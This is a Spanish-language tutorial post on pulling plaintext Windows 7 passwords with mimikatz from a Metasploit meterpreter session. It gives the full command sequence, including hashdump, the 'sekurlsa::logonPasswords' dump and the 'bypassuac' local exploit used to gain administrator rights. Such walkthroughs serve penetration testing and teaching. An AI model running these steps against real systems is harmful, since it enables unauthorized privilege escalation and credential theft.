Antes de todo como saben MimiKatz es una herramienta que aparecio hace un par de años atras la cual hizo el boom boom del momento ya que aprovechaba de Windows y sus puntos débiles para obtener credenciales en texto plano
A continuación tenemos algunas referencias adicionales de la herramienta que estoy seguro que les servira a mas de uno.
- Using mimikatz to dump passwords
- Protecting privileged domain accounts disabling encrypted passwords
- Blog mimikatz
- Pentester - Luchando contra mimikatz
La entrada que nombramos es la siguiente una union con meterpreter.
En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.
Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de
Código: Bash
- getsystem
o también
Código: Bash
- hashdump
pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).
Si hicieramos uso de getsystem posiblemente obtengamos este error:
Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos http://blog.gentilkiwi.com/mimikatz, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32
ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.
subimos mimikatz.exe con el comando upload
lo siguiente es lanzar una shell
Código: Bash
- shell
y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.
Código: Bash
privilege::debug
sekurlsa::logonPasswords full
Nos saldrá este error esto por el tema de privilegios
Para ello haremos uso de este exploit “exploit/windows/local/bypassuac”, pero antes tenemos que enviar la sesion a background con el mismo comando.
Código: Bash
- background
Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera
Código: Bash
use exploit/windows/local/bypassuac
set SESSION 1
exploit
Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con
Código: Bash
- sessions -i 2
nos damos cuenta que tenemos maximos privilegios con el comando
Código: Bash
- getuid
Finalmente lanzamos la shell y ejecutamos mimikatz.exe
Autor de la PoC: Typh0n
Regards,
Snifer